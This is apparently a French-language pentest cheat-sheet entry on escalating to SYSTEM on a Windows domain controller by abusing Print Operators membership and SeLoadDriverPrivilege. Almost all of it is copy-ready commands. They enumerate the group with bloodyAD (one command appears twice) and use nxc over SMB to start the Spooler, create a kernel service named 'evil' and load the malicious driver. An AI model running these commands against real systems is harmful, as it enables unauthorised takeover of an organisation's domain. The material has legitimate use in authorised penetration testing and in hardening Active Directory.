Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get members 'Print Operators'Description: Lister les membres du groupe Print Operators : peut charger des drivers kernel en tant que SYSTEM.
Exploitation
Abus de SeLoadDriverPrivilege via Print Operators pour obtenir SYSTEM sur le DC.
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get members 'Print Operators'Description: Lister les membres du groupe Print Operators : peut charger des drivers kernel en tant que SYSTEM.
nxc smb $DC -u $USER -p $PASS -x 'sc config Spooler start= auto && sc start Spooler'Description: S'assurer que le service Spooler est actif : requis pour charger un driver.
nxc smb $DC -u $USER -p $PASS -x 'sc create evil binPath= "C:\Temp\evil.exe" type= kernel'Description: Créer un service kernel malveillant : Print Operators peut charger des drivers non signés.
nxc smb $DC -u $USER -p $PASS -x 'EnableSeLoadDriverPrivilege.exe && sc start evil'Description: Activer SeLoadDriverPrivilege puis démarrer le driver malveillant : SYSTEM obtenu.